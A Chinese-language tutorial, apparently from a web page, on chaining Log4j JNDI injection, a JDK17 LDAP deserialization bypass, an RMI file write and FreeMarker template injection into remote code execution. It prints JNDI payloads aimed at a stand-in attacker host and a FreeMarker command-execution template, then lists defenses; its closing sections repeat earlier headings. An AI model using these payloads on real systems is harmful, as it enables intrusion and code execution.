JDK17高版本JNDI绕过导致文件写入的新思路教学文档<\/h1>

1. 漏洞背景与概述<\/h2>
本教学文档将详细讲解一种针对JDK17高版本环境下，通过JNDI注入绕过限制实现文件写入的新颖攻击方法。该技术结合了Log4j漏洞、JDK17反序列化绕过和FreeMarker模板注入，形成一条完整的攻击链。<\/p>

2. 环境分析<\/h2>

2.1 目标环境特征<\/h3>

JDK版本：17（高版本）<\/li>
Web框架：Spring Boot<\/li>
日志组件：Log4j 2.14.1（存在漏洞版本）<\/li>
模板引擎：FreeMarker 2.3.30+<\/li>

服务器：Tomcat 9.0.63（高版本）<\/li> <\/ul>

2.2 关键漏洞点<\/h3>

Log4j 2.14.1的JNDI注入漏洞<\/li>
JDK17的反序列化限制可被绕过<\/li>
存在可被利用的工具类（设置环境变量和创建目录）<\/li>

FreeMarker模板注入漏洞<\/li> <\/ol>

3. 攻击链分析<\/h2>

3.1 第一阶段：Log4j漏洞触发<\/h3>

入口点<\/strong>：\/admin\/name<\/code>路由<\/p>

触发条件<\/strong>：<\/p>

当name参数包含特定符号时会进入else分支<\/li> 调用Logger.log<\/code>方法触发Log4j漏洞<\/li> <\/ul> 利用方式<\/strong>：<\/p> \/\/ 示例Payload <\/span><\/span><\/span><\/span>${<\/span>jndi:<\/span>ldap:<\/span>\/\/attacker.com\/exploit} <\/span><\/span><\/span><\/code><\/pre>3.2 第二阶段：JDK17 JNDI绕过<\/h3> 在JDK17中，com.sun.jndi.ldap.object.trustURLCodebase<\/code>默认为false，无法直接进行远程类加载。但可以通过以下路径绕过：<\/p> c_lookup<\/code>调用Obj.decodeObject<\/code><\/li> decodeObject<\/code>方法中VersionHelper.isSerialDataAllowed()<\/code>默认返回true<\/li> 进入deserializeObject<\/code>方法<\/li> 最终调用readObject<\/code>实现反序列化<\/li> <\/ol> 关键代码路径<\/strong>：<\/p> com.<\/span>sun<\/span>.<\/span>jndi<\/span>.<\/span>ldap<\/span>.<\/span>Obj<\/span>.<\/span>decodeObject<\/span>()<\/span> <\/span><\/span>com.<\/span>sun<\/span>.<\/span>jndi<\/span>.<\/span>ldap<\/span>.<\/span>Obj<\/span>.<\/span>deserializeObject<\/span>()<\/span> <\/span><\/span><\/code><\/pre>3.3 第三阶段：工具类利用<\/h3> 存在一个特殊工具类可以设置环境变量和创建目录：<\/p> System.<\/span>setProperty<\/span>(<\/span>this<\/span>.<\/span>dirPro<\/span>.<\/span>split<\/span>(<\/span>":"<\/span>)[<\/span>0<\/span>],<\/span> this<\/span>.<\/span>dirPro<\/span>.<\/span>split<\/span>(<\/span>":"<\/span>)[<\/span>1<\/span>]);<\/span> <\/span><\/span><\/code><\/pre>利用方式<\/strong>：通过反序列化调用该工具类，实现目录创建和环境变量设置。<\/p> 3.4 第四阶段：文件写入与RCE<\/h3> 技术组合<\/strong>：<\/p> 使用MemoryUserDatabaseFactory<\/code>通过RMI协议进行文件写入<\/li> 结合FreeMarker模板注入实现RCE<\/li> <\/ol> 关键点<\/strong>：<\/p> 路径拼接必须准确，否则会报错："User database is not persistable - no write permissions on directory"<\/li> FreeMarker 2.3.30+需要沙箱绕过<\/li> 特殊字符需要进行编码<\/li> <\/ul> 4. 完整攻击步骤<\/h2> 4.1 准备阶段<\/h3> 编写恶意Java类（TestDir.java）用于反序列化利用<\/li> 搭建LDAP服务指向恶意类<\/li> 准备RMI服务用于文件写入<\/li> <\/ol> 4.2 攻击执行<\/h3> 触发Log4j漏洞<\/strong>：<\/p> GET<\/span> \/admin\/name?name=${jndi:ldap:\/\/attacker-ip\/Exploit} HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span><\/code><\/pre><\/li> JDK17反序列化绕过<\/strong>：<\/p> 通过LDAP服务提供恶意序列化对象<\/li> 触发工具类执行，创建所需目录<\/li> <\/ul> <\/li> 文件写入<\/strong>：<\/p> 通过RMI服务写入恶意FreeMarker模板<\/li> 覆盖原有模板文件（如templates\/admin.ftl<\/code>）<\/li> <\/ul> <\/li> 模板注入执行<\/strong>：<\/p> 访问被覆盖的模板页面<\/li> 触发FreeMarker模板注入实现RCE<\/li> <\/ul> <\/li> <\/ol> 4.3 文件写入细节<\/h3> 路径构造示例<\/strong>：<\/p> \/\/ 错误示例（路径不存在） <\/span><\/span><\/span><\/span>catalina.<\/span>base<\/span> +<\/span> "..\/..\/templates"<\/span> <\/span><\/span> <\/span><\/span>\/\/ 正确示例（确保路径存在） <\/span><\/span><\/span><\/span>catalina.<\/span>base<\/span> +<\/span> "webapps\/ROOT\/WEB-INF\/templates"<\/span> <\/span><\/span><\/code><\/pre>恶意FreeMarker模板内容<\/strong>：<\/p> <#assign ex="freemarker.template.utility.Execute"?new()>${ ex("id") } <\/code><\/pre> 5. 防御措施<\/h2> Log4j防护<\/strong>：<\/p> 升级Log4j至最新安全版本<\/li> 设置log4j2.formatMsgNoLookups=true<\/code><\/li> <\/ul> <\/li> JDK防护<\/strong>：<\/p> 设置com.sun.jndi.ldap.object.trustURLCodebase=false<\/code><\/li> 限制JNDI访问外部资源<\/li> <\/ul> <\/li> FreeMarker防护<\/strong>：<\/p> 升级至最新安全版本<\/li> 启用沙箱模式<\/li> 限制模板访问权限<\/li> <\/ul> <\/li> 其他措施<\/strong>：<\/p> 审查所有可设置环境变量的代码<\/li> 限制目录创建权限<\/li> 实施文件完整性监控<\/li> <\/ul> <\/li> <\/ol> 6. 总结<\/h2> 这种攻击方式展示了现代Web应用中多重漏洞组合利用的复杂性。攻击者通过：<\/p> 利用Log4j漏洞作为入口<\/li> 绕过JDK17的安全限制<\/li> 利用工具类功能创建攻击所需环境<\/li> 最终通过模板注入实现RCE<\/li> <\/ol> 防御需要采取纵深防御策略，覆盖应用的所有层面，从基础组件到业务逻辑代码都需要进行安全审计和加固。<\/p>

JDK17高版本JNDI绕过导致文件写入的新思路教学文档<\/h1>

1. 漏洞背景与概述<\/h2> 本教学文档将详细讲解一种针对JDK17高版本环境下，通过JNDI注入绕过限制实现文件写入的新颖攻击方法。该技术结合了Log4j漏洞、JDK17反序列化绕过和FreeMarker模板注入，形成一条完整的攻击链。<\/p>

2. 环境分析<\/h2>

3. 攻击链分析<\/h2>

4. 完整攻击步骤<\/h2>

1. 漏洞背景与概述<\/h2>
本教学文档将详细讲解一种针对JDK17高版本环境下，通过JNDI注入绕过限制实现文件写入的新颖攻击方法。该技术结合了Log4j漏洞、JDK17反序列化绕过和FreeMarker模板注入，形成一条完整的攻击链。<\/p>